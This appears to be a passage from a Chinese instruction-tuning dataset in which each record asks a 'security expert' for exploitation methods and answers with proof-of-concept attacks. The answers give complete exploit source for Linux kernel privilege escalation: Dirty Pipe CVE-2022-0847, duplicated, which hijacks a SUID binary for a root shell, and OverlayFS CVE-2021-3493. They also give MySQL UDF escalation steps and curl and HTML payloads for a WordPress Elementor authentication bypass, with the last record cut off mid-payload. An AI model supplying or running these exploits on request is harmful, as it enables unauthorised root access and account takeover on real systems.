  521. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Linux DirtyPipe权限提升漏洞 CVE-2022-0847\n漏洞描述:CVE-2022-0847-DirtyPipe-Exploit CVE-2022-0847 是存在于 Linux内核 5.8 及之后版本中的本地提权漏洞。攻击者通过利用此漏洞,可覆盖重写任意可读文件中的数据,从而可将普通权限的用户提升到特权 root。 CVE-2022-0847 的漏洞原理类似于 CVE-2016-5195 脏牛漏洞(Dirty Cow),但它更容易被利用。漏洞作者将此漏洞命名为“Dirty Pipe”\n影响版本:``` Linux内核 5.8 及之后版本 ```\n", "input": "", "output": "【漏洞类型】os_vulnerability\n【CVE编号】CVE-2022-0847\n【POC利用方法】\n1. Linux内核 5.8 及之后版本\n2. find / -user root -perm /4000 2>/dev/null\n3. //\n// dirtypipez.c\n//\n// hacked up Dirty Pipe (CVE-2022-0847) PoC that hijacks a SUID binary to spawn\n// a root shell. (and attempts to restore the damaged binary as well)\n//\n// Wow, Dirty CoW reloaded!\n//\n// -- blasty <peter@haxx.in> // 2022-03-07\n\n/* SPDX-License-Identifier: GPL-2.0 */\n/*\n * Copyright 2022 CM4all GmbH / IONOS SE\n *\n * author: Max Kellermann <max.kellermann@ionos.com>\n *\n * Proof-of-concept exploit for the Dirty Pipe\n * vulnerability (CVE-2022-0847) caused by an uninitialized\n * \"pipe_buffer.flags\" variable.  It demonstrates how to overwrite any\n * file contents in the page cache, even if the file is not permitted\n * to be written, immutable or on a read-only mount.\n *\n * This exploit requires Linux 5.8 or later; the code path was made\n * reachable by commit f6dd975583bd (\"pipe: merge\n * anon_pipe_buf*_ops\").  The commit did not introduce the bug, it was\n * there before, it just provided an easy way to exploit it.\n *\n * There are two major limitations of this exploit: the offset cannot\n * be on a page boundary (it needs to write one byte before the offset\n * to add a reference to this page to the pipe), and the write cannot\n * cross a page boundary.\n *\n * Example: ./write_anything /root/.ssh/authorized_keys 1 $'\\nssh-ed25519 AAA......\\n'\n *\n * Further explanation: https://dirtypipe.cm4all.com/\n */\n\n#define _GNU_SOURCE\n#include <unistd.h>\n#include <fcntl.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <sys/stat.h>\n#include <sys/user.h>\n#include <stdint.h>\n\n#ifndef PAGE_SIZE\n#define PAGE_SIZE 4096\n#endif\n\n// small (linux x86_64) ELF file matroshka doll that does;\n//   fd = open(\"/tmp/sh\", O_WRONLY | O_CREAT | O_TRUNC);\n//   write(fd, elfcode, elfcode_len)\n//   chmod(\"/tmp/sh\", 04755)\n//   close(fd);\n//   exit(0);\n//\n// the dropped ELF simply does:\n//   setuid(0);\n//   setgid(0);\n//   execve(\"/bin/sh\", [\"/bin/sh\", NULL], [NULL]);\nunsigned char elfcode[] = {\n\t/*0x7f,*/ 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,\n\t0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,\n\t0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,\n\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n\t0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,\n\t0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00,\n\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,\n\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,\n\t0x97, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x97, 0x01, 0x00, 0x00,\n\t0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n\t0x48, 0x8d, 0x3d, 0x56, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0x41, 0x02,\n\t0x00, 0x00, 0x48, 0xc7, 0xc0, 0x02, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48,\n\t0x89, 0xc7, 0x48, 0x8d, 0x35, 0x44, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc2,\n\t0xba, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc0, 0x01, 0x00, 0x00, 0x00, 0x0f,\n\t0x05, 0x48, 0xc7, 0xc0, 0x03, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x8d,\n\t0x3d, 0x1c, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0xed, 0x09, 0x00, 0x00,\n\t0x48, 0xc7, 0xc0, 0x5a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x31, 0xff,\n\t0x48, 0xc7, 0xc0, 0x3c, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x2f, 0x74, 0x6d,\n\t0x70, 0x2f, 0x73, 0x68, 0x00, 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01,\n\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e,\n\t0x00, 0x01, 0x00, 0x00, 0x00, 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00,\n\t0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38,\n\t0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00,\n\t0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n\t0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40,\n\t0x00, 0x00, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n\t0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00,\n\t0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x69,\n\t0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x6a,\n\t0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x8d, 0x3d, 0x1b, 0x00, 0x00, 0x00,\n\t0x6a, 0x00, 0x48, 0x89, 0xe2, 0x57, 0x48, 0x89, 0xe6, 0x48, 0xc7, 0xc0,\n\t0x3b, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0xc7, 0xc0, 0x3c, 0x00, 0x00,\n\t0x00, 0x0f, 0x05, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00\n};\n\n/**\n * Create a pipe where all \"bufs\" on the pipe_inode_info ring have the\n * PIPE_BUF_FLAG_CAN_MERGE flag set.\n */\nstatic void prepare_pipe(int p[2])\n{\n\tif (pipe(p)) abort();\n\n\tconst unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ);\n\tstatic char buffer[4096];\n\n\t/* fill the pipe completely; each pipe_buffer will now have\n\t   the PIPE_BUF_FLAG_CAN_MERGE flag */\n\tfor (unsigned r = pipe_size; r > 0;) {\n\t\tunsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;\n\t\twrite(p[1], buffer, n);\n\t\tr -= n;\n\t}\n\n\t/* drain the pipe, freeing all pipe_buffer instances (but\n\t   leaving the flags initialized) */\n\tfor (unsigned r = pipe_size; r > 0;) {\n\t\tunsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;\n\t\tread(p[0], buffer, n);\n\t\tr -= n;\n\t}\n\n\t/* the pipe is now empty, and if somebody adds a new\n\t   pipe_buffer without initializing its \"flags\", the buffer\n\t   will be mergeable */\n}\n\nint hax(char *filename, long offset, uint8_t *data, size_t len) {\n\t/* open the input file and validate the specified offset */\n\tconst int fd = open(filename, O_RDONLY); // yes, read-only! :-)\n\tif (fd < 0) {\n\t\tperror(\"open failed\");\n\t\treturn -1;\n\t}\n\n\tstruct stat st;\n\tif (fstat(fd, &st)) {\n\t\tperror(\"stat failed\");\n\t\treturn -1;\n\t}\n\n\t/* create the pipe with all flags initialized with\n\t   PIPE_BUF_FLAG_CAN_MERGE */\n\tint p[2];\n\tprepare_pipe(p);\n\n\t/* splice one byte from before the specified offset into the\n\t   pipe; this will add a reference to the page cache, but\n\t   since copy_page_to_iter_pipe() does not initialize the\n\t   \"flags\", PIPE_BUF_FLAG_CAN_MERGE is still set */\n\t--offset;\n\tssize_t nbytes = splice(fd, &offset, p[1], NULL, 1, 0);\n\tif (nbytes < 0) {\n\t\tperror(\"splice failed\");\n\t\treturn -1;\n\t}\n\tif (nbytes == 0) {\n\t\tfprintf(stderr, \"short splice\\n\");\n\t\treturn -1;\n\t}\n\n\t/* the following write will not create a new pipe_buffer, but\n\t   will instead write into the page cache, because of the\n\t   PIPE_BUF_FLAG_CAN_MERGE flag */\n\tnbytes = write(p[1], data, len);\n\tif (nbytes < 0) {\n\t\tperror(\"write failed\");\n\t\treturn -1;\n\t}\n\tif ((size_t)nbytes < len) {\n\t\tfprintf(stderr, \"short write\\n\");\n\t\treturn -1;\n\t}\n\n\tclose(fd);\n\n\treturn 0;\n}\n\nint main(int argc, char **argv) {\n\tif (argc != 2) {\n\t\tfprintf(stderr, \"Usage: %s SUID\\n\", argv[0]);\n\t\treturn EXIT_FAILURE;\n\t}\n\n\tchar *path = argv[1];\n\tuint8_t *data = elfcode;\n\n\tint fd = open(path, O_RDONLY);\n\tuint8_t *orig_bytes = malloc(sizeof(elfcode));\n\tlseek(fd, 1, SEEK_SET);\n\tread(fd, orig_bytes, sizeof(elfcode));\n\tclose(fd);\n\n\tprintf(\"[+] hijacking suid binary..\\n\");\n\tif (hax(path, 1, elfcode, sizeof(elfcode)) != 0) {\n\t\tprintf(\"[~] failed\\n\");\n\t\treturn EXIT_FAILURE;\n\t}\n\n\tprintf(\"[+] dropping suid shell..\\n\");\n\tsystem(path);\n\n\tprintf(\"[+] restoring suid binary..\\n\");\n\tif (hax(path, 1, orig_bytes, sizeof(elfcode)) != 0) {\n\t\tprintf(\"[~] failed\\n\");\n\t\treturn EXIT_FAILURE;\n\t}\n\n\tprintf(\"[+] popping root shell.. (dont forget to clean up /tmp/sh ;))\\n\");\n\tsystem(\"/tmp/sh\");\n\n\treturn EXIT_SUCCESS;\n}\n", "category": "poc_os_vulnerability", "source": "awesome_poc_dataset", "file_path": "操作系统漏洞/Linux DirtyPipe权限提升漏洞 CVE-2022-0847.md"}
    522. 

  522. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Linux DirtyPipe 权限提升漏洞 CVE-2022-0847\n漏洞描述:CVE-2022-0847 是存在于 Linux内核 5.8 及之后版本中的本地提权漏洞。攻击者通过利用此漏洞,可覆盖重写任意可读文件中的数据,从而可将普通权限的用户提升到特权 root。 CVE-2022-0847 的漏洞原理类似于 CVE-2016-5195 脏牛漏洞(Dirty Cow),但它更容易被利用。漏洞作者将此漏洞命名为“Dirty Pipe”\n影响版本:``` Linux内核 5.8 及之后版本 ```\n", "input": "", "output": "【漏洞类型】os_vulnerability\n【CVE编号】CVE-2022-0847\n【POC利用方法】\n1. Linux内核 5.8 及之后版本\n2. find / -user root -perm /4000 2>/dev/null\n3. //\n// dirtypipez.c\n//\n// hacked up Dirty Pipe (CVE-2022-0847) PoC that hijacks a SUID binary to spawn\n// a root shell. (and attempts to restore the damaged binary as well)\n//\n// Wow, Dirty CoW reloaded!\n//\n// -- blasty <peter@haxx.in> // 2022-03-07\n\n/* SPDX-License-Identifier: GPL-2.0 */\n/*\n * Copyright 2022 CM4all GmbH / IONOS SE\n *\n * author: Max Kellermann <max.kellermann@ionos.com>\n *\n * Proof-of-concept exploit for the Dirty Pipe\n * vulnerability (CVE-2022-0847) caused by an uninitialized\n * \"pipe_buffer.flags\" variable.  It demonstrates how to overwrite any\n * file contents in the page cache, even if the file is not permitted\n * to be written, immutable or on a read-only mount.\n *\n * This exploit requires Linux 5.8 or later; the code path was made\n * reachable by commit f6dd975583bd (\"pipe: merge\n * anon_pipe_buf*_ops\").  The commit did not introduce the bug, it was\n * there before, it just provided an easy way to exploit it.\n *\n * There are two major limitations of this exploit: the offset cannot\n * be on a page boundary (it needs to write one byte before the offset\n * to add a reference to this page to the pipe), and the write cannot\n * cross a page boundary.\n *\n * Example: ./write_anything /root/.ssh/authorized_keys 1 $'\\nssh-ed25519 AAA......\\n'\n *\n * Further explanation: https://dirtypipe.cm4all.com/\n */\n\n#define _GNU_SOURCE\n#include <unistd.h>\n#include <fcntl.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <sys/stat.h>\n#include <sys/user.h>\n#include <stdint.h>\n\n#ifndef PAGE_SIZE\n#define PAGE_SIZE 4096\n#endif\n\n// small (linux x86_64) ELF file matroshka doll that does;\n//   fd = open(\"/tmp/sh\", O_WRONLY | O_CREAT | O_TRUNC);\n//   write(fd, elfcode, elfcode_len)\n//   chmod(\"/tmp/sh\", 04755)\n//   close(fd);\n//   exit(0);\n//\n// the dropped ELF simply does:\n//   setuid(0);\n//   setgid(0);\n//   execve(\"/bin/sh\", [\"/bin/sh\", NULL], [NULL]);\nunsigned char elfcode[] = {\n\t/*0x7f,*/ 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,\n\t0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,\n\t0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,\n\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n\t0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,\n\t0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00,\n\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,\n\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,\n\t0x97, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x97, 0x01, 0x00, 0x00,\n\t0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n\t0x48, 0x8d, 0x3d, 0x56, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0x41, 0x02,\n\t0x00, 0x00, 0x48, 0xc7, 0xc0, 0x02, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48,\n\t0x89, 0xc7, 0x48, 0x8d, 0x35, 0x44, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc2,\n\t0xba, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc0, 0x01, 0x00, 0x00, 0x00, 0x0f,\n\t0x05, 0x48, 0xc7, 0xc0, 0x03, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x8d,\n\t0x3d, 0x1c, 0x00, 0x00, 0x00, 0x48, 0xc7, 0xc6, 0xed, 0x09, 0x00, 0x00,\n\t0x48, 0xc7, 0xc0, 0x5a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x31, 0xff,\n\t0x48, 0xc7, 0xc0, 0x3c, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x2f, 0x74, 0x6d,\n\t0x70, 0x2f, 0x73, 0x68, 0x00, 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01,\n\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e,\n\t0x00, 0x01, 0x00, 0x00, 0x00, 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00,\n\t0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n\t0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38,\n\t0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00,\n\t0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n\t0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40,\n\t0x00, 0x00, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n\t0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00,\n\t0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x69,\n\t0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x6a,\n\t0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x8d, 0x3d, 0x1b, 0x00, 0x00, 0x00,\n\t0x6a, 0x00, 0x48, 0x89, 0xe2, 0x57, 0x48, 0x89, 0xe6, 0x48, 0xc7, 0xc0,\n\t0x3b, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0xc7, 0xc0, 0x3c, 0x00, 0x00,\n\t0x00, 0x0f, 0x05, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00\n};\n\n/**\n * Create a pipe where all \"bufs\" on the pipe_inode_info ring have the\n * PIPE_BUF_FLAG_CAN_MERGE flag set.\n */\nstatic void prepare_pipe(int p[2])\n{\n\tif (pipe(p)) abort();\n\n\tconst unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ);\n\tstatic char buffer[4096];\n\n\t/* fill the pipe completely; each pipe_buffer will now have\n\t   the PIPE_BUF_FLAG_CAN_MERGE flag */\n\tfor (unsigned r = pipe_size; r > 0;) {\n\t\tunsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;\n\t\twrite(p[1], buffer, n);\n\t\tr -= n;\n\t}\n\n\t/* drain the pipe, freeing all pipe_buffer instances (but\n\t   leaving the flags initialized) */\n\tfor (unsigned r = pipe_size; r > 0;) {\n\t\tunsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;\n\t\tread(p[0], buffer, n);\n\t\tr -= n;\n\t}\n\n\t/* the pipe is now empty, and if somebody adds a new\n\t   pipe_buffer without initializing its \"flags\", the buffer\n\t   will be mergeable */\n}\n\nint hax(char *filename, long offset, uint8_t *data, size_t len) {\n\t/* open the input file and validate the specified offset */\n\tconst int fd = open(filename, O_RDONLY); // yes, read-only! :-)\n\tif (fd < 0) {\n\t\tperror(\"open failed\");\n\t\treturn -1;\n\t}\n\n\tstruct stat st;\n\tif (fstat(fd, &st)) {\n\t\tperror(\"stat failed\");\n\t\treturn -1;\n\t}\n\n\t/* create the pipe with all flags initialized with\n\t   PIPE_BUF_FLAG_CAN_MERGE */\n\tint p[2];\n\tprepare_pipe(p);\n\n\t/* splice one byte from before the specified offset into the\n\t   pipe; this will add a reference to the page cache, but\n\t   since copy_page_to_iter_pipe() does not initialize the\n\t   \"flags\", PIPE_BUF_FLAG_CAN_MERGE is still set */\n\t--offset;\n\tssize_t nbytes = splice(fd, &offset, p[1], NULL, 1, 0);\n\tif (nbytes < 0) {\n\t\tperror(\"splice failed\");\n\t\treturn -1;\n\t}\n\tif (nbytes == 0) {\n\t\tfprintf(stderr, \"short splice\\n\");\n\t\treturn -1;\n\t}\n\n\t/* the following write will not create a new pipe_buffer, but\n\t   will instead write into the page cache, because of the\n\t   PIPE_BUF_FLAG_CAN_MERGE flag */\n\tnbytes = write(p[1], data, len);\n\tif (nbytes < 0) {\n\t\tperror(\"write failed\");\n\t\treturn -1;\n\t}\n\tif ((size_t)nbytes < len) {\n\t\tfprintf(stderr, \"short write\\n\");\n\t\treturn -1;\n\t}\n\n\tclose(fd);\n\n\treturn 0;\n}\n\nint main(int argc, char **argv) {\n\tif (argc != 2) {\n\t\tfprintf(stderr, \"Usage: %s SUID\\n\", argv[0]);\n\t\treturn EXIT_FAILURE;\n\t}\n\n\tchar *path = argv[1];\n\tuint8_t *data = elfcode;\n\n\tint fd = open(path, O_RDONLY);\n\tuint8_t *orig_bytes = malloc(sizeof(elfcode));\n\tlseek(fd, 1, SEEK_SET);\n\tread(fd, orig_bytes, sizeof(elfcode));\n\tclose(fd);\n\n\tprintf(\"[+] hijacking suid binary..\\n\");\n\tif (hax(path, 1, elfcode, sizeof(elfcode)) != 0) {\n\t\tprintf(\"[~] failed\\n\");\n\t\treturn EXIT_FAILURE;\n\t}\n\n\tprintf(\"[+] dropping suid shell..\\n\");\n\tsystem(path);\n\n\tprintf(\"[+] restoring suid binary..\\n\");\n\tif (hax(path, 1, orig_bytes, sizeof(elfcode)) != 0) {\n\t\tprintf(\"[~] failed\\n\");\n\t\treturn EXIT_FAILURE;\n\t}\n\n\tprintf(\"[+] popping root shell.. (dont forget to clean up /tmp/sh ;))\\n\");\n\tsystem(\"/tmp/sh\");\n\n\treturn EXIT_SUCCESS;\n}\n", "category": "poc_os_vulnerability", "source": "awesome_poc_dataset", "file_path": "操作系统漏洞/Linux DirtyPipe 权限提升漏洞 CVE-2022-0847.md"}
    523. 

  523. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Linux kernel 权限提升漏洞 CVE-2021-3493\n漏洞描述:Ubuntu OverlayFS Local Privesc CVE-2021-3493 EXP在Github被公开,可以通过EXP在Ubuntu多个影响系统中提升 ROOT权限\n影响版本:``` Ubuntu 20.10 Ubuntu 20.04 LTS Ubuntu 18.04 LTS Ubuntu 16.04 LTS Ubuntu 14.04 ESM ```\n", "input": "", "output": "【漏洞类型】os_vulnerability\n【CVE编号】CVE-2021-3493\n【POC利用方法】\n1. Ubuntu 20.10\nUbuntu 20.04 LTS\nUbuntu 18.04 LTS\nUbuntu 16.04 LTS\nUbuntu 14.04 ESM\n2. gcc exploit.c -o exploit\nchmod +x exploit\n./exploit\n3. #define _GNU_SOURCE\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <unistd.h>\n#include <fcntl.h>\n#include <err.h>\n#include <errno.h>\n#include <sched.h>\n#include <sys/types.h>\n#include <sys/stat.h>\n#include <sys/wait.h>\n#include <sys/mount.h>\n\n//#include <attr/xattr.h>\n//#include <sys/xattr.h>\nint setxattr(const char *path, const char *name, const void *value, size_t size, int flags);\n\n\n#define DIR_BASE    \"./ovlcap\"\n#define DIR_WORK    DIR_BASE \"/work\"\n#define DIR_LOWER   DIR_BASE \"/lower\"\n#define DIR_UPPER   DIR_BASE \"/upper\"\n#define DIR_MERGE   DIR_BASE \"/merge\"\n#define BIN_MERGE   DIR_MERGE \"/magic\"\n#define BIN_UPPER   DIR_UPPER \"/magic\"\n\n\nstatic void xmkdir(const char *path, mode_t mode)\n{\n    if (mkdir(path, mode) == -1 && errno != EEXIST)\n        err(1, \"mkdir %s\", path);\n}\n\nstatic void xwritefile(const char *path, const char *data)\n{\n    int fd = open(path, O_WRONLY);\n    if (fd == -1)\n        err(1, \"open %s\", path);\n    ssize_t len = (ssize_t) strlen(data);\n    if (write(fd, data, len) != len)\n        err(1, \"write %s\", path);\n    close(fd);\n}\n\nstatic void xcopyfile(const char *src, const char *dst, mode_t mode)\n{\n    int fi, fo;\n\n    if ((fi = open(src, O_RDONLY)) == -1)\n        err(1, \"open %s\", src);\n    if ((fo = open(dst, O_WRONLY | O_CREAT, mode)) == -1)\n        err(1, \"open %s\", dst);\n\n    char buf[4096];\n    ssize_t rd, wr;\n\n    for (;;) {\n        rd = read(fi, buf, sizeof(buf));\n        if (rd == 0) {\n            break;\n        } else if (rd == -1) {\n            if (errno == EINTR)\n                continue;\n            err(1, \"read %s\", src);\n        }\n\n        char *p = buf;\n        while (rd > 0) {\n            wr = write(fo, p, rd);\n            if (wr == -1) {\n                if (errno == EINTR)\n                    continue;\n                err(1, \"write %s\", dst);\n            }\n            p += wr;\n            rd -= wr;\n        }\n    }\n\n    close(fi);\n    close(fo);\n}\n\nstatic int exploit()\n{\n    char buf[4096];\n\n    sprintf(buf, \"rm -rf '%s/'\", DIR_BASE);\n    system(buf);\n\n    xmkdir(DIR_BASE, 0777);\n    xmkdir(DIR_WORK,  0777);\n    xmkdir(DIR_LOWER, 0777);\n    xmkdir(DIR_UPPER, 0777);\n    xmkdir(DIR_MERGE, 0777);\n\n    uid_t uid = getuid();\n    gid_t gid = getgid();\n\n    if (unshare(CLONE_NEWNS | CLONE_NEWUSER) == -1)\n        err(1, \"unshare\");\n\n    xwritefile(\"/proc/self/setgroups\", \"deny\");\n\n    sprintf(buf, \"0 %d 1\", uid);\n    xwritefile(\"/proc/self/uid_map\", buf);\n\n    sprintf(buf, \"0 %d 1\", gid);\n    xwritefile(\"/proc/self/gid_map\", buf);\n\n    sprintf(buf, \"lowerdir=%s,upperdir=%s,workdir=%s\", DIR_LOWER, DIR_UPPER, DIR_WORK);\n    if (mount(\"overlay\", DIR_MERGE, \"overlay\", 0, buf) == -1)\n        err(1, \"mount %s\", DIR_MERGE);\n\n    // all+ep\n    char cap[] = \"\\x01\\x00\\x00\\x02\\xff\\xff\\xff\\xff\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x00\\x00\\x00\\x00\";\n\n    xcopyfile(\"/proc/self/exe\", BIN_MERGE, 0777);\n    if (setxattr(BIN_MERGE, \"security.capability\", cap, sizeof(cap) - 1, 0) == -1)\n        err(1, \"setxattr %s\", BIN_MERGE);\n\n    return 0;\n}\n\nint main(int argc, char *argv[])\n{\n    if (strstr(argv[0], \"magic\") || (argc > 1 && !strcmp(argv[1], \"shell\"))) {\n        setuid(0);\n        setgid(0);\n        execl(\"/bin/bash\", \"/bin/bash\", \"--norc\", \"--noprofile\", \"-i\", NULL);\n        err(1, \"execl /bin/bash\");\n    }\n\n    pid_t child = fork();\n    if (child == -1)\n        err(1, \"fork\");\n\n    if (child == 0) {\n        _exit(exploit());\n    } else {\n        waitpid(child, NULL, 0);\n    }\n\n    execl(BIN_UPPER, BIN_UPPER, \"shell\", NULL);\n    err(1, \"execl %s\", BIN_UPPER);\n}\n", "category": "poc_os_vulnerability", "source": "awesome_poc_dataset", "file_path": "操作系统漏洞/Linux kernel 权限提升漏洞 CVE-2021-3493.md"}
    524. 

  524. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:MySQL UDF提权\n漏洞描述:UDF是MySQL的一个共享库,通过udf创建能够执行系统命令的函数sys_exec、sys_eval,使得入侵者能够获得一般情况下无法获得的shell执行权限。 参考链接: - https://github.com/mysqludf/lib_mysqludf_sys - https://www.sqlsec.com/2020/11/mysql.html#%E5%86%99%E5%85%A5%E5%8A%A8%E6%80%81%E9%93%BE%E6%8E%A5%E5%BA%93\n影响版本:``` 在 MySQL 5.5 之前 secure_file_priv 默认是空,这个情况下可以向任意绝对路径写文件 在 MySQL 5.5 之后 secure_file_priv 默认是 NULL,这个情况下不可以写文件 ```\n", "input": "", "output": "【漏洞类型】server_application_vulnerability\n【POC利用方法】\n1. 在 MySQL 5.5 之前 secure_file_priv 默认是空,这个情况下可以向任意绝对路径写文件\n在 MySQL 5.5 之后 secure_file_priv 默认是 NULL,这个情况下不可以写文件\n2. mysql> show variables like '%plugin%';\n+---------------+-------------------------+\n| Variable_name | Value                   |\n+---------------+-------------------------+\n| plugin_dir    | /usr/lib64/mysql/plugin |\n+---------------+-------------------------+\n1 row in set (0.00 sec)\n3. mysql> select * from func;\n", "category": "poc_server_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "服务器应用漏洞/MySQL UDF提权.md"}
    525. 

  525. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:WordPress Elementor Page Builder Plus 身份验证绕过 CVE-2021-24175\n漏洞描述:未经身份验证的用户可以使用\"theplus_ajax_login\"和\"theplus_google_ajax_register\" Ajax请求,通过仅提供相关的用户名,就可以像任何用户一样轻松地进行身份验证。 参考链接: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24175 - https://wpscan.com/vulnerability/c311feef-7041-4c21-9525-132b9bd32f89\n影响版本:``` Elementor Page Builder <4.1.7 ```\n", "input": "", "output": "【漏洞类型】server_application_vulnerability\n【CVE编号】CVE-2021-24175\n【POC利用方法】\n1. Elementor Page Builder <4.1.7\n2. curl -X POST --data action=theplus_ajax_login --data email=admin -iLSS https://example.com/wp-admin/admin-ajax.php\ncurl -X POST --data action=theplus_google_ajax_register --data email=admin --data nonce=a -iLSS https://example.com/wp-admin/admin-ajax.php\n3. <form method=\"POST\" action=\"https://example.com/wp-admin/admin-ajax.php\">\n<input value=\"newadmin\" name=\"name\" type=\"text\">\n<input value=\"test@example.com\" name=\"email\" type=\"text\">\n<input value=\"test\" name=\"password\" type=\"text\">\n<input value=\"theplus_google_ajax_register\" name=\"action\" type=\"text\">\n<input value=\"administrator\" 